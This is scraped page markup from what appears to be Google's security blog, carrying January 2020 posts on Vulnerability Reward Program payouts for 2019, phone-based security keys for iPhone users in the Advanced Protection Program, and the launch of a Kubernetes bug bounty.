alt='Share on Twitter' height='24' 
src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'> &#57529; </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' data-url='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> </div> </div> </div> <div class='post' data-id='8774093356612127397' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' itemprop='url' title='Vulnerability Reward Program: 2019 Year in Review'> Vulnerability Reward Program: 2019 Year in Review </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 28, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Natasha Pabrai, Jan Keller, 
Jessica Lin, Anna Hupa, and Adam Bacchus, Vulnerability Reward Programs at Google</span><br /> <br /> Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.<br /> <br /> 2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we&#8217;ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That&#8217;s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s1600/01+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="1600" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s640/01+Vulnerability+Graph.png" width="640" /></a></div> Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. 
As we have done in years past, we are sharing our 2019 Year in Review across these programs.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s1600/02+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="1600" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s640/02+Vulnerability+Graph.png" width="640" /></a></div> <b>What&#8217;s changed in the past year?</b><br /> <br /> <ul> <li>Chrome&#8217;s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their <a href="https://g.co/ChromeBugRewards#rewards">program rules page</a>.</li> <li>Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we&#8217;re adding in a 50% bonus, making the top prize $1.5 million. 
See our <a href="https://www.google.com/about/appsecurity/android-rewards/">program rules page</a> for more details around our new exploit categories and rewards.</li> <li>Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.</li> <li>The <a href="https://hackerone.com/googleplay">Google Play Security Reward Program</a> expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.</li> <li>The <a href="https://hackerone.com/ddp_reward_program">Developer Data Protection Reward Program</a> was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.</li> </ul> <div> We also had the goal of increasing engagement with our security researchers over the last year at events such as <a href="https://www.facebook.com/notes/facebook-bug-bounty/bountycon-2019-is-a-wrap/2568024086545135/">BountyCon</a> in Singapore and <a href="https://twitter.com/GoogleVRP/status/1197449225405112320">ESCAL8 in London</a>. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.</div> <div> <br /></div> <div> A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. 
Follow us on <a href="https://twitter.com/GoogleVRP">@GoogleVRP</a><br /> <br /> <i>*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.</i></div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Natasha Pabrai, Jan Keller, Jessica Lin, Anna Hupa, and Adam Bacchus, Vulnerability Reward Programs at Google</span><br /> <br /> Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.<br /> <br /> 2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we&#8217;ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That&#8217;s 5x the amount we have ever previously donated in a single year. 
Thanks so much for your hard work and generous giving!<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s1600/01+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="1600" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s640/01+Vulnerability+Graph.png" width="640" /></a></div> Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. 
As we have done in years past, we are sharing our 2019 Year in Review across these programs.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s1600/02+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="1600" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s640/02+Vulnerability+Graph.png" width="640" /></a></div> <b>What&#8217;s changed in the past year?</b><br /> <br /> <ul> <li>Chrome&#8217;s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their <a href="https://g.co/ChromeBugRewards#rewards">program rules page</a>.</li> <li>Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we&#8217;re adding in a 50% bonus, making the top prize $1.5 million. 
See our <a href="https://www.google.com/about/appsecurity/android-rewards/">program rules page</a> for more details around our new exploit categories and rewards.</li> <li>Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.</li> <li>The <a href="https://hackerone.com/googleplay">Google Play Security Reward Program</a> expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.</li> <li>The <a href="https://hackerone.com/ddp_reward_program">Developer Data Protection Reward Program</a> was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.</li> </ul> <div> We also had the goal of increasing engagement with our security researchers over the last year at events such as <a href="https://www.facebook.com/notes/facebook-bug-bounty/bountycon-2019-is-a-wrap/2568024086545135/">BountyCon</a> in Singapore and <a href="https://twitter.com/GoogleVRP/status/1197449225405112320">ESCAL8 in London</a>. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.</div> <div> <br /></div> <div> A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. 
Follow us on <a href="https://twitter.com/GoogleVRP">@GoogleVRP</a><br /> <br /> <i>*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.</i></div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Vulnerability Reward Program: 2019 Year in Review&url=https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'> &#57529; </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' data-url='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> 
<div class='label-footer'> <span class='labels-caption'> Labels: </span> <span class='labels'> <a class='label' href='https://security.googleblog.com/search/label/android%20security' rel='tag'> android security </a> </span> </div> </div> </div> <div class='post' data-id='3940323990877633093' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' itemprop='url' title='Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program'> Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 15, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Christiaan Brand, Product Manager, Google Cloud and Kaiyu Yan, Software Engineer, Google</span><br /> <span class="byline-author"><br /></span> <span class="byline-author"><span id="docs-internal-guid-bc9b1c30-7fff-1b9f-05fa-a740ee25cd5d"></span></span><br /> Phishing&#8212;when an online attacker tries to trick you into giving them your username and password&#8212;is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. 
Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.<br /> <br /> Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the <a href="https://landing.google.com/advancedprotection/">Advanced Protection Program</a>&#8212;our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.<br /> <br /> Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys <a href="https://www.blog.google/technology/safety-security/your-android-phone-is-a-security-key/">into Android phones</a>&#8212;and starting today, you can activate a security key on your iPhone to help protect your Google Account.<br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s1600/ipaask1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="285" height="400" src="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s400/ipaask1.png" width="222" /></a></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Activating the security key on your iPhone with Google&#8217;s Smart Lock app</span></b></div> <div style="text-align: left;"> <br /></div> Security keys use public-key cryptography to verify both your identity and the origin (URL) of the login page, so a phishing site at a look-alike address gets nothing it can reuse and an attacker can&#8217;t access 
your account even if they have your username and password. Unlike other two-factor authentication (2FA) methods, whose one-time codes can be phished and replayed just like a password, security keys are built with <a href="https://fidoalliance.org/how-fido-works/">FIDO standards</a> that provide the <a href="https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html">strongest</a> protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our <a href="https://youtu.be/ktN88Vnmnns">Cloud Next &#8216;19 presentation</a>. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s1600/ipaask2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="512" height="200" src="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s400/ipaask2.gif" width="400" /></a></div> <div style="text-align: center;"> <br /></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Approving the sign-in to a Google Account with Google&#8217;s Smart Lock app on an iPhone</span></b></div> <div style="text-align: center;"> <b><br /></b></div> On your iPhone, the security key can be activated with Google&#8217;s <a href="https://apps.apple.com/us/app/google-smart-lock/id1152066360">Smart Lock app</a>; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices; the Bluetooth connection is what confirms that your phone is physically near the device you&#8217;re signing in on. 
This helps protect your Google Account on virtually any device with the convenience of your phone.<br /> <b><br /></b> <b>How to get started</b><br /> <b><br /></b> Follow these simple steps to help protect your personal or work Google Account today:<br /> <ul> <li><a href="https://support.google.com/accounts/answer/9289445">Activate</a> your phone&#8217;s security key (Android 7+ or iOS 10+)</li> <li><a href="https://myaccount.google.com/advanced-protection/landing">Enroll</a> in the Advanced Protection Program</li> <li>When signing in to your Google Account, make sure Bluetooth is turned on both on your phone and on the device you&#8217;re signing in on.</li> </ul> We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can still get into your account if you lose your phone&#8212;without a backup key, a lost phone can lock you out. You can get a security key from a number of vendors, including Google, with our own <a href="https://store.google.com/us/product/titan_security_key">Titan Security Key</a>.<br /> <br /> If you&#8217;re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise <a href="https://gsuiteupdates.googleblog.com/2019/11/advanced-protection-program-high-risk-users.html">on our G Suite Updates blog</a>.<br /> <br /> Here&#8217;s to stronger account security&#8212;right in your pocket. 
<span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Christiaan Brand, Product Manager, Google Cloud and Kaiyu Yan, Software Engineer, Google</span><br /> <span class="byline-author"><br /></span> <span class="byline-author"><span id="docs-internal-guid-bc9b1c30-7fff-1b9f-05fa-a740ee25cd5d"></span></span><br /> Phishing&#8212;when an online attacker tries to trick you into giving them your username and password&#8212;is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.<br /> <br /> Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the <a href="https://landing.google.com/advancedprotection/">Advanced Protection Program</a>&#8212;our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.<br /> <br /> Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. 
Last year, we built security keys <a href="https://www.blog.google/technology/safety-security/your-android-phone-is-a-security-key/">into Android phones</a>&#8212;and starting today, you can activate a security key on your iPhone to help protect your Google Account.<br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s1600/ipaask1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="285" height="400" src="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s400/ipaask1.png" width="222" /></a></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Activating the security key on your iPhone with Google&#8217;s Smart Lock app</span></b></div> <div style="text-align: left;"> <br /></div> Security keys use public-key cryptography to verify both your identity and the origin (URL) of the login page, so a phishing site at a look-alike address gets nothing it can reuse and an attacker can&#8217;t access your account even if they have your username and password. Unlike other two-factor authentication (2FA) methods, whose one-time codes can be phished and replayed just like a password, security keys are built with <a href="https://fidoalliance.org/how-fido-works/">FIDO standards</a> that provide the <a href="https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html">strongest</a> protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our <a href="https://youtu.be/ktN88Vnmnns">Cloud Next &#8216;19 presentation</a>. 
<br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s1600/ipaask2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="512" height="200" src="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s400/ipaask2.gif" width="400" /></a></div> <div style="text-align: center;"> <br /></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Approving the sign-in to a Google Account with Google&#8217;s Smart Lock app on an iPhone</span></b></div> <div style="text-align: center;"> <b><br /></b></div> On your iPhone, the security key can be activated with Google&#8217;s <a href="https://apps.apple.com/us/app/google-smart-lock/id1152066360">Smart Lock app</a>; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices; the Bluetooth connection is what confirms that your phone is physically near the device you&#8217;re signing in on. 
This helps protect your Google Account on virtually any device with the convenience of your phone.<br /> <b><br /></b> <b>How to get started</b><br /> <b><br /></b> Follow these simple steps to help protect your personal or work Google Account today:<br /> <ul> <li><a href="https://support.google.com/accounts/answer/9289445">Activate</a> your phone&#8217;s security key (Android 7+ or iOS 10+)</li> <li><a href="https://myaccount.google.com/advanced-protection/landing">Enroll</a> in the Advanced Protection Program</li> <li>When signing in to your Google Account, make sure Bluetooth is turned on both on your phone and on the device you&#8217;re signing in on.</li> </ul> We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can still get into your account if you lose your phone&#8212;without a backup key, a lost phone can lock you out. You can get a security key from a number of vendors, including Google, with our own <a href="https://store.google.com/us/product/titan_security_key">Titan Security Key</a>.<br /> <br /> If you&#8217;re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise <a href="https://gsuiteupdates.googleblog.com/2019/11/advanced-protection-program-high-risk-users.html">on our G Suite Updates blog</a>.<br /> <br /> Here&#8217;s to stronger account security&#8212;right in your pocket. <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Have an iPhone? 
Use it to protect your Google Account with the Advanced Protection Program&url=https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'> &#57529; </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' data-url='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> </div> </div> </div> <div class='post' data-id='3755530779899321300' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' itemprop='url' title='Securing open-source: how Google supports the new Kubernetes bug bounty'> Securing open-source: how Google supports the new Kubernetes bug bounty </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' 
itemprop='datePublished'> January 14, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Maya Kaczorowski, Product Manager, Container Security and Aaron Small, Product Manager, GKE On-Prem Security</span><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s1600/kubernetes-bug-bounty-01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1600" height="334" src="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s640/kubernetes-bug-bounty-01.jpg" width="640" /></a></div> <br /> At Google, we care deeply about the security of open-source projects, as they&#8217;re such a critical part of our infrastructure&#8212;and indeed everyone&#8217;s. Today, the Cloud-Native Computing Foundation (CNCF) announced a <a href="https://hackerone.com/kubernetes">new bug bounty program for Kubernetes</a> that we helped create and get up and running. Here&#8217;s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.<br /> <div> <br /></div> <b>Launching the Kubernetes bug bounty program</b><br /> <b><br /></b> <a href="https://kubernetes.io/">Kubernetes</a> is a CNCF project. As part of <a href="https://github.com/cncf/toc/pull/145">its graduation criteria</a>, the CNCF recently funded the project&#8217;s first <a href="https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf">security audit</a>, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. 
Thankfully, Kubernetes already had a <a href="https://github.com/kubernetes/community/tree/master/committee-product-security">Product Security Committee</a>, including engineers from the <a href="https://cloud.google.com/kubernetes-engine/">Google Kubernetes Engine</a> (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes&#8217; security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began <a href="https://docs.google.com/document/d/1dvlQsOGODhY3blKpjTg6UXzRdPzv5y8V55RD_Pbo7ag/edit#heading=h.7t1efwpev42p">discussions in 2018</a> about launching an official bug bounty program.<br /> <div> <br /></div> <b>Find Kubernetes bugs, get paid</b><br /> <div> <br /></div> <div> What kind of bugs does the bounty program recognize? Most of the content you&#8217;d think of as &#8216;core&#8217; Kubernetes, included at <a href="https://github.com/kubernetes">https://github.com/kubernetes</a>, is in scope. We&#8217;re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we&#8217;re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn&#8217;t a &#8216;live&#8217; environment for you to test&#8212;Kubernetes can be configured in many different ways, and we&#8217;re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). 
Thanks to the CNCF&#8217;s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.</div> <div> <br /></div> The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and helping us test the triage process. And today, the new Kubernetes bug bounty program is live! We&#8217;re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved in the <a href="https://kubernetes.io/blog/2020/01/14/kubernetes-bug-bounty-announcement/">Kubernetes bug bounty announcement</a>.<br /> <div> <br /></div> <b>Dedicated to Kubernetes security</b><br /> <b><br /></b> Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding <a href="https://www.hackerone.com/blog/hackerone-launches-bug-bounty-program-kubernetes">HackerOne</a> to implement the bug bounty solution. Though this is a big effort, it&#8217;s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including <a href="https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-vulnerability-management-in-open-source-kubernetes">responding to vulnerabilities </a>as part of the Kubernetes Product Security Committee, <a href="https://github.com/kubernetes/community/tree/master/sig-auth">chairing the sig-auth Kubernetes special interest group</a>, and <a href="https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-security-audit-what-gke-and-anthos-users-need-to-know">leading the aforementioned Kubernetes security audit</a>. 
